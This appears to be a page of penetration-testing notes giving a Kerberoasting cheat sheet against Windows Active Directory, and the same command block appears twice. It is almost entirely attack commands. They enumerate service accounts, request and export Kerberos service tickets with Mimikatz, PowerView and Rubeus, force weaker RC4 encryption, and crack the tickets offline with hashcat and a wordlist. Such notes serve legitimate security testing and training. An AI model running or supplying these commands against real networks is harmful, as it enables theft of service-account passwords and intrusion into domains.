Windows

Semi Manual method

# Enumerating SPNs with setspn.exe
C:\> setspn.exe -Q */*

# Requesting tickets and loading them into memory 
# Targeting a Single User
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\pow> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.domain.local:1433"

# Extracting Tickets from Memory with Mimikatz
mimikatz # base64 /out:true
mimikatz # kerberos::list /export

# Preparing the Base64 Blob for Cracking
echo "<base64 blob>" |  tr -d \\n

# Placing the Output into a File as .kirbi
cat encoded_file | base64 -d > sqldev.kirbi

# Using kirbi2john.py tool to extract the Kerberos ticket from the TGS file.
# too link : <https://raw.githubusercontent.com/nidem/kerberoast/907bf234745fe907cf85f3fd916d1c14ab9d65c0/kirbi2john.py>
python2.7 kirbi2john.py sqldev.kirbi

# Modifiying crack_file for Hashcat
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

# Cracking the Hash with Hashcat
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

Automated

# Using PowerView to Extract TGS Tickets
PS C:\> Import-Module .\PowerView.ps1
PS C:\> Get-DomainUser * -spn | select samaccountname

# Using PowerView to Target a Specific User
PS C:\> Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

# Exporting All Tickets to a CSV File
PS C:\> Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\output_tgs.csv -NoTypeInformation

# Then We can crack using hashcat

# Using the /stats Flag
PS C:\> .\Rubeus.exe kerberoast /stats

# Using the /nowrap Flag
PS C:\> .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

# RC4 is easier to crack than AES or other encryption algorithms
# Using the /tgtdeleg Flag to request onlt RC4 encrypted tickets
PS C:\> .\Rubeus.exe kerberoast /tgtdeleg /user:testspn /nowrap

PreviousLinux NextACL

Last updated 2 years ago

Semi Manual method

# Enumerating SPNs with setspn.exe
C:\> setspn.exe -Q */*

# Requesting tickets and loading them into memory 
# Targeting a Single User
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\pow> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.domain.local:1433"

# Extracting Tickets from Memory with Mimikatz
mimikatz # base64 /out:true
mimikatz # kerberos::list /export

# Preparing the Base64 Blob for Cracking
echo "<base64 blob>" |  tr -d \\n

# Placing the Output into a File as .kirbi
cat encoded_file | base64 -d > sqldev.kirbi

# Using kirbi2john.py tool to extract the Kerberos ticket from the TGS file.
# too link : <https://raw.githubusercontent.com/nidem/kerberoast/907bf234745fe907cf85f3fd916d1c14ab9d65c0/kirbi2john.py>
python2.7 kirbi2john.py sqldev.kirbi

# Modifiying crack_file for Hashcat
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

# Cracking the Hash with Hashcat
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt

Automated

# Using PowerView to Extract TGS Tickets
PS C:\> Import-Module .\PowerView.ps1
PS C:\> Get-DomainUser * -spn | select samaccountname

# Using PowerView to Target a Specific User
PS C:\> Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat

# Exporting All Tickets to a CSV File
PS C:\> Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\output_tgs.csv -NoTypeInformation

# Then We can crack using hashcat

# Using the /stats Flag
PS C:\> .\Rubeus.exe kerberoast /stats

# Using the /nowrap Flag
PS C:\> .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

# RC4 is easier to crack than AES or other encryption algorithms
# Using the /tgtdeleg Flag to request onlt RC4 encrypted tickets
PS C:\> .\Rubeus.exe kerberoast /tgtdeleg /user:testspn /nowrap